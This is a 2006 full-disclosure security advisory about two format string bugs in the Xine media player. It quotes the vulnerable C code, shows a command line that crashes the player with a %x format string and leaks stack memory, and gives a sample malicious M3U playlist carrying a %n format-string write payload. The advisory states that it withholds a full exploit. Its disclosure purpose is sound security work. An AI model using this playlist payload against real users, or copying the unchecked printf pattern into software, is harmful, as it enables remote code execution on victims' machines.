<<< Date Index >>>     <<< Thread Index >>>

Remote Xine Format String Vulnerability



/*
 
*****************************************************************************************************************
  $ An open security advisory #16 - Xine Media Player Format String Bug
 
*****************************************************************************************************************
  1: Bug Researcher: c0ntex - c0ntexb[at]gmail.com -+- www.open-security.org
  2: Bug Released: April 18th 2006
  3: Bug Impact Rate: Undefined
  4: Bug Scope Rate: Local / Remote
 
*****************************************************************************************************************
  $ This advisory and/or proof of concept code must not be used for commercial 
gain.
 
*****************************************************************************************************************

  Xine Media Player
  http://winehq.de

  "xine is a free multimedia player. It plays back CDs, DVDs, and VCDs. It also 
decodes multimedia files like
  AVI, MOV, WMV, and MP3 from local disk drives, and displays multimedia 
streamed over the Internet. It
  interprets many of the most common multimedia formats available - and some of 
the most uncommon formats, too."


  There are 2 format string bugs in the latest version of Xine that could be 
exploited by a malicious person
  to execute code on the system of a remote user running the media player 
against a malicious playlist file.
  By passing a format specifier in the path of a file that is embedded in a 
remote playlist, it is possible
  to trigger this bug.


  The evil code can be found here, in xine-ui-0.99.4/src/xitk/main.c:453:
  ... snip ...

  static void print_formatted(char *title, const char *const *plugins) {
    const char  *plugin;
    char         buffer[81];
    int          len;
    char        *blanks = "     ";

    printf(title);

    sprintf(buffer, "%s", blanks);
    plugin = *plugins++;

    while(plugin) {

      len = strlen(buffer);

      if((len + (strlen(plugin) + 3)) < 80) {
        sprintf(buffer, "%s%s%s", buffer, (strlen(buffer) == strlen(blanks)) ? 
"" : ", ", plugin);
      }
      else {
        printf(buffer);
        printf(",\n");
        snprintf(buffer, sizeof(buffer), "%s%s", blanks, plugin);
      }

  ... snip ...


  Looking at BUG-REPORT.txt we can verify the goodness:

  c0ntex@debauch:~$ xine --no-splash --bug-report -gI 
AAAAAAAA%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x
  %x%x%x%x%x%x%x
  This is xine (X11 gui) - a free video player v0.99.3.
  (c) 2000-2004 The xine Team.
  xiTK received SIGSEGV signal, RIP.
  Aborted
  c0ntex@debauch:~$ less BUG-REPORT.txt

  ... snip ...
  xine: found input plugin  : file input plugin

  ---------------------- (ERROR) ----------------------
  The specified file or mrl is not found. Please check it twice. 
(AAAAAAAA811bfb1be1fdac88e232888e2329
  
8000206568546365707365696669696620646f20656c726d20727369206c746f6e20756f6620202e646e61656c5063206573
  6b636568207469206369777428202e65  [4141414141414141]  
7825782578257825782578257825782578257825)
  ... snip ...


  An example malicious playlist file to trigger the bug:


  #EXTM3U
  #EXTINFO !!All_You_Playlists_Are_Belong_To_Us - 
SHHEEEELLLLCCCCOOOOOODDDDDDEEEEEEEEEEE!!
  AAAAAAAAAAA%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%.13068u%n%hn


  Obviously, we can see straight away that this is a straight forward format 
string bug which provides a trivial
  way to hijack .DTORS or some other useful address, allowing the execution of 
malicious code on a remote victims
  boxen.

  I dropped in to the Xine developers IRC channel over a year ago telling them 
about this bug, I never got a reply,
  it's my guess that they are as sick of Xine bugs as everyone else is. I hope 
you havent been using Xine to play
  remote Music fileZ!!! tsk tsk - those that have know who they are ;) and we 
do too :D

  We are not dropping exploit code with this advisory so that Xine can get 
their act together, write decent code,
  and release a patched version. I guess the Xine guys haven't heard of egrep. 
Anyway, maybe they will patch up
  before more people get owned.


  Full Disclosure -> Useful for the victims
  Open Source -> Useful for the hackers
  Shameless 1980's format string bug -> Priceless


  Regards to everyone I know, especially all the #social's @ pulltheplug.

*/